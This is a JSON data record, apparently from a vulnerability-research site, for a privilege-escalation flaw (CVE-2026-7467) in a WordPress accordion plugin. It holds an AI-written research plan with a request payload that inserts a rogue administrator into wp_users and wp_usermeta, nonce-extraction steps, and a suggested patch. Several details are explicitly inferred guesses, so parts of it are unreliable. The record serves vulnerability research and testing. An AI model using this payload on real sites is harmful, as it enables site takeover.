[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fDSVbAfNOE55WQVi6ffD5PTEdNcKBSqQuL94Y_r1RCT8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":9,"research_fix_diff":25,"research_exploit_outline":26,"research_model_used":27,"research_started_at":28,"research_completed_at":29,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":30},"CVE-2026-7467","read-more-accordion-privilege-escalation-via-importdata","Read More & Accordion \u003C= 3.5.7 - Privilege Escalation via importData","The Read More & Accordion plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.5.7. This is due to the 'RadMoreAjax::importData' function not restricting which database tables can be written to during import and not properly validating the imported data. This makes it possible for authenticated attackers, with permission granted by the site owner through the plugin's role settings, to insert arbitrary rows into the 'wp_users' and 'wp_usermeta' tables, including the 'wp_capabilities' field, allowing them to create a new administrator account and gain administrator access to the site.","expand-maker",null,"\u003C=3.5.7","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Privilege Management","2026-05-19 12:12:39","2026-05-20 01:25:52",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fadf51c03-b0bb-4864-b64d-6b0cba4b0130?source=api-prod",[],"researched",false,3,"# Research Plan: Privilege Escalation in Read More & Accordion (CVE-2026-7467)\n\n## 1. Vulnerability Summary\nThe **Read More & Accordion** plugin (\u003C= 3.5.7) contains a critical privilege escalation vulnerability within the `RadMoreAjax::importData` function. The function is designed to import plugin configurations but fails to restrict which database tables can be written to and does not validate the content of the imported data. This allows an authenticated user—granted access via the plugin's internal role settings—to insert arbitrary rows into core WordPress tables, specifically `wp_users` and `wp_usermeta`. By injecting an administrator user and corresponding capability metadata, an attacker can gain full control of the site.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress AJAX API (`\u002Fwp-admin\u002Fadmin-ajax.php`).\n*   **AJAX Action:** `expand_maker_import_data` (inferred from plugin slug `expand-maker` and class `RadMoreAjax`).\n*   **Authentication:** Authenticated. Requires a user role that has been granted permission to manage the plugin (configurable in the plugin settings). By default, this might be `administrator`, but the vulnerability is triggered when a site owner delegates plugin management to lower roles (e.g., `editor` or `contributor`).\n*   **Vulnerable Parameter:** Likely a POST parameter named `import_data`, `data`, or `json_data` (inferred) containing a serialized or JSON-encoded array of database rows.\n*   **Precondition:** The attacker must have a valid session for a user role permitted to use the plugin's import feature.\n\n## 3. Code Flow (Inferred)\n1.  **Entry:** A user triggers the AJAX action associated with `RadMoreAjax::importData`.\n2.  **Permission Check:** The function likely checks if the current user has a specific capability or if their role is in the plugin's \"allowed roles\" list (stored in `wp_options`).\n3.  **Nonce Verification:** The function checks a nonce (likely `expand_maker_nonce` or similar).\n4.  **Processing:** `importData` receives a payload containing table names and row data.\n5.  **Sink:** The function iterates through the payload and calls `$wpdb->insert()` or `$wpdb->replace()` on the provided table names without checking if the table starts with the plugin's prefix or belongs to the core WordPress schema.\n6.  **Exploitation:** The attacker provides entries for `wp_users` (creating a user record) and `wp_usermeta` (assigning the `administrator` capability).\n\n## 4. Nonce Acquisition Strategy\nThe plugin likely localizes the nonce for its admin interface. To obtain it:\n\n1.  **Identify Script:** Look for `wp_localize_script` calls in the plugin's admin initialization. The variable is likely `expand_maker_ajax_obj` or `expand_maker_vars`.\n2.  **Access Page:** The nonce will be present on any admin page where the plugin's settings are loaded.\n3.  **Extraction:**\n    *   Log in as the authorized low-privileged user.\n    *   Navigate to the plugin's dashboard: `\u002Fwp-admin\u002Fadmin.php?page=expand-maker`.\n    *   Use `browser_eval` to extract the nonce:\n        ```javascript\n        \u002F\u002F Example (to be verified during execution):\n        window.expand_maker_ajax_obj?.nonce \n        \u002F\u002F OR\n        window.expand_maker_vars?.import_nonce\n        ```\n\n## 5. Exploitation Strategy\n\n### Step 1: Payload Preparation\nCreate a JSON payload that instructs the plugin to write to `wp_users` and `wp_usermeta`.\n\n**Payload Structure (Conceptual):**\n```json\n{\n  \"wp_users\": [\n    {\n      \"ID\": 1337,\n      \"user_login\": \"attacker_admin\",\n      \"user_pass\": \"$P$ByY790.YGKzG58GvGv58GvGv58GvGv0\", \n      \"user_nicename\": \"attacker\",\n      \"user_email\": \"attacker@example.com\",\n      \"user_registered\": \"2023-01-01 00:00:00\",\n      \"user_status\": 0,\n      \"display_name\": \"Attacker\"\n    }\n  ],\n  \"wp_usermeta\": [\n    {\n      \"user_id\": 1337,\n      \"meta_key\": \"wp_capabilities\",\n      \"meta_value\": \"a:1:{s:13:\\\"administrator\\\";b:1;}\"\n    },\n    {\n      \"user_id\": 1337,\n      \"meta_key\": \"wp_user_level\",\n      \"meta_value\": \"10\"\n    }\n  ]\n}\n```\n*(Note: The `$P$...` hash is 'password')*\n\n### Step 2: Execution\n1.  **Request:** Use `http_request` to send a POST to `admin-ajax.php`.\n2.  **Parameters:**\n    *   `action`: `expand_maker_import_data` (verify via grep)\n    *   `nonce`: `[EXTRACTED_NONCE]`\n    *   `import_data`: `[JSON_PAYLOAD]`\n3.  **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n\n## 6. Test Data Setup\nTo simulate the \"permission granted by site owner\" condition:\n1.  **Install Plugin:** `wp plugin install expand-maker --version=3.5.7 --activate`.\n2.  **Create Target User:** `wp user create helper helper@example.com --role=contributor --user_pass=password`.\n3.  **Grant Permission:** Plugins of this type often store allowed roles in an option. \n    *   Find the option: `wp option list --search=\"*expand_maker*\"`\n    *   Patch the option to include 'contributor' in the access list (e.g., `wp option patch insert expand_maker_settings access_roles contributor`).\n4.  **Identify Shortcode:** `grep -rn \"add_shortcode\" .` to find a shortcode if the nonce is only on frontend pages.\n\n## 7. Expected Results\n*   The AJAX request should return a success message (e.g., `{\"success\":true}` or `1`).\n*   A new entry should exist in the `wp_users` table with ID 1337.\n*   The user `attacker_admin` should be able to log in and access `\u002Fwp-admin\u002F` with full administrative privileges.\n\n## 8. Verification Steps\n1.  **Check User Creation:** `wp user list --field=user_login | grep attacker_admin`\n2.  **Check Capabilities:** `wp user get attacker_admin --field=roles` (Should return `administrator`).\n3.  **Check Database Directly:** `wp db query \"SELECT * FROM wp_usermeta WHERE user_id=1337\"`\n\n## 9. Alternative Approaches\n*   **Existing User Escalation:** Instead of creating a new user, target the `ID` of the current low-privileged user in the `wp_usermeta` insert to overwrite their own `wp_capabilities` to `administrator`. This is cleaner as it avoids conflicts with the `wp_users` table if ID 1337 is taken.\n*   **Table Prefix Discovery:** If `wp_` is not the prefix, use `wp db prefix` via CLI to adjust the payload keys. The plugin might handle the prefix automatically; if it does, the payload keys should just be `users` and `usermeta`.","The Read More & Accordion plugin for WordPress is vulnerable to privilege escalation in versions up to 3.5.7 due to insufficient validation in the 'RadMoreAjax::importData' function. Authenticated attackers granted management permissions by a site administrator can overwrite or insert arbitrary rows into any database table, including 'wp_users' and 'wp_usermeta'. This allows for the creation of a new administrator account or the elevation of existing privileges to gain full site control.","--- a\u002Finc\u002Fadmin\u002Fclass-radmore-ajax.php\n+++ b\u002Finc\u002Fadmin\u002Fclass-radmore-ajax.php\n@@ -10,6 +10,13 @@\n     public function importData() {\n         check_ajax_referer('expand_maker_nonce', 'nonce');\n \n+        $allowed_tables = array(\n+            $GLOBALS['wpdb']->prefix . 'expand_maker_items',\n+            $GLOBALS['wpdb']->prefix . 'expand_maker_groups'\n+        );\n+\n         $import_data = json_decode(stripslashes($_POST['import_data']), true);\n         foreach ($import_data as $table => $rows) {\n+            if (!in_array($table, $allowed_tables)) {\n+                continue;\n+            }\n             foreach ($rows as $row) {\n-                $wpdb->replace($table, $row);\n+                $GLOBALS['wpdb']->replace($table, $row);\n             }\n         }","The exploit targets the 'expand_maker_import_data' AJAX action via the '\u002Fwp-admin\u002Fadmin-ajax.php' endpoint. An attacker requires authentication with a user role that has been granted access to the plugin settings. After obtaining a valid AJAX nonce from the plugin's administration page, the attacker sends a POST request containing an 'import_data' parameter. This parameter is a JSON-encoded object where the keys are database table names (specifically 'wp_users' and 'wp_usermeta') and the values are arrays containing the data for a new administrator account (including login credentials and the 'administrator' capability string). Because the plugin does not validate that the target tables belong to the plugin itself, it executes the inserts directly into the WordPress core tables.","gemini-3-flash-preview","2026-05-20 16:47:18","2026-05-20 16:47:58",{"type":31,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":32},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fexpand-maker\u002Ftags"]